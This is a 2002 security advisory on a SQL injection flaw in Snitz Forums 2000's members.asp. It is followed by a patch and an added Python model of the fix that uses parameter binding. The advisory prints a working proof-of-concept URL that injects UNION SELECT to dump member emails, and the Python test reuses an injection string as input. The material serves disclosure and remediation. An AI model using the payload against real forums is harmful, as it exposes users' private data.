26th Sep 2002 [SBWID-5296]
COMMAND
	Snitz Forums 2000 remote SQL query manipulation vulnerability
SYSTEMS AFFECTED
	Snitz Forums 2000 versions 3.3, 3.3.01, 3.3.02, 3.3.03
PROBLEM
	acemi posted:
	In the members.asp page, when listing the members with a criteria, the
	input (M_NAME) is not checked for malicious code. As a result, an
	attacker can add an extra SELECT statement to the query with UNION and
	he/she can view any data in the forum's database.
	 Proof-of-concept
	 ----------------
	Normally, to view the members' list whose membername starts with 'A',
	the members.asp page is used as follows:
	
	/members.asp?mode=search&M_NAME=A&initial=1&method=
	
	Use this link to view the vulnerability:
	
	/members.asp?mode=search&M_NAME=XXXX%25')%20UNION%20SELECT%20MEMBER_ID,%20M_STATUS,%20M_NAME%20%2B%20'/'%20%2B%20M_EMAIL%20%2B%20'/',%20M_LEVEL,%20M_EMAIL,%20M_COUNTRY,%20M_HOMEPAGE,%20M_ICQ,%20M_YAHOO,%20M_AIM,%20M_TITLE,%20M_POSTS,%20M_LASTPOSTDATE,%20M_LASTHEREDATE,%20M_DATE,%20M_STATE%20FROM%20FORUM_MEMBERS%20WHERE%20(M_NAME%20LIKE%20'&initial=1&method=
	
	The MEMBERNAME column will be displayed as a MEMBERNAME/EMAIL/ column.
SOLUTION
	To fix this bug, in members.asp, change the following lines:
	
	SearchName = Request("M_NAME")
	if SearchName = "" then
	  SearchName = Request.Form("M_NAME")
	end if
	
	with:
	
	if IsValidString(Request("M_NAME")) then
	  SearchName = Request("M_NAME")
	end if
	if SearchName = "" then
	  if IsValidString(Request.Form("M_NAME")) then
	    SearchName = Request.Form("M_NAME")
	  end if
	end if
	
	and in function IsValidString(sValidate) in inc_functions.asp, change
	the following line:
	
	sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<"
	
	with:
	
	sInvalidChars = "!#$%^&*()=+{}[]|\;:/?>,<'"
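	The following is an added Python model of the fix above; it is not code from the advisory or from Snitz Forums. It reproduces IsValidString() with the blacklist before and after the single quote was appended, runs the member search against a constructed in-memory SQLite table (a stand-in for FORUM_MEMBERS, with only a few of its columns), and binds the search value as a query parameter so the driver never interprets it as SQL. The function names is_valid_string, search_members, parameterized_search and make_demo_db, and the table contents, are assumptions made for this example.

```python
import sqlite3

# Blacklist from the advisory's IsValidString() before and after the fix
# (the fix appends a single quote). The backslash is escaped for Python.
INVALID_CHARS_BEFORE = "!#$%^&*()=+{}[]|\\;:/?>,<"
INVALID_CHARS_AFTER = INVALID_CHARS_BEFORE + "'"


def is_valid_string(value, invalid_chars=INVALID_CHARS_AFTER):
    """Model of Snitz's IsValidString(): reject input containing any
    blacklisted character. Empty input is accepted, as in the original."""
    return not any(ch in invalid_chars for ch in value)


def make_demo_db():
    """Constructed in-memory stand-in for FORUM_MEMBERS (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE FORUM_MEMBERS ("
        "MEMBER_ID INTEGER PRIMARY KEY, M_NAME TEXT, M_EMAIL TEXT, M_LEVEL INTEGER)"
    )
    conn.executemany(
        "INSERT INTO FORUM_MEMBERS (M_NAME, M_EMAIL, M_LEVEL) VALUES (?, ?, ?)",
        [
            ("alice", "alice@example.invalid", 1),
            ("anna", "anna@example.invalid", 3),
            ("bob", "bob@example.invalid", 1),
        ],
    )
    return conn


def parameterized_search(conn, search_name):
    """Prefix search on M_NAME with the value bound as a parameter.
    Whatever the caller passes stays data: it can only ever be a LIKE
    pattern, never an additional SELECT."""
    cur = conn.execute(
        "SELECT M_NAME FROM FORUM_MEMBERS WHERE M_NAME LIKE ? ORDER BY M_NAME",
        (search_name + "%",),
    )
    return [row[0] for row in cur.fetchall()]


def search_members(conn, search_name):
    """Member search as the patched members.asp should behave: validate
    first, then run the bound query. Returns None when the input is
    rejected (this explicit signal is a choice of this example)."""
    if not is_valid_string(search_name):
        return None
    return parameterized_search(conn, search_name)


if __name__ == "__main__":
    db = make_demo_db()
    print(search_members(db, "a"))       # members whose name starts with "a"
    print(search_members(db, "a') UNION SELECT M_EMAIL FROM FORUM_MEMBERS WHERE ('"))
    print(is_valid_string("o'brien", INVALID_CHARS_BEFORE),
          is_valid_string("o'brien", INVALID_CHARS_AFTER))
```

	Two things the advisory's fix leaves for the operator to weigh: the blacklist now rejects legitimate names containing an apostrophe, and it does not cover the LIKE wildcard `_`, so a search value can still match more broadly than intended. Parameter binding, shown in parameterized_search, is what actually keeps the value from becoming SQL, independent of which characters the blacklist happens to list.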